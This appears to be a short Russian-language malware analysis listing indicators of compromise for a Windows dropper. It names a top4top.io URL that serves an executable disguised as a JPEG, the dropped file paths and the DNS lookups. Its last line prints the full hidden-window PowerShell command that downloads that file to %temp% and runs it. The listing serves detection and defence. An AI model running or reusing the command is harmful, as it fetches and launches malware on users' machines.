Техническая информация
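- Загружает https://g.top4top.io/p_16086kslq1.jpg и сохраняет как %temp%\idsvc.exe (под расширением .jpg доставляется исполняемый файл, который затем запускается)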
- %TEMP%\idsvc.exe
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\run.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\catalog.dat
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt (легитимный адрес Microsoft PKI; сам по себе не является индикатором компрометации)
- DNS ASK g.###4top.io
- DNS ASK microsoft.com
- DNS ASK el#####y369.linkpc.net
- '%TEMP%\idsvc.exe'
- '<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://g.top4top.io/p_16086kslq1.jpg','%temp%\idsvc.exe');Start-Process '%temp%\idsvc.exe'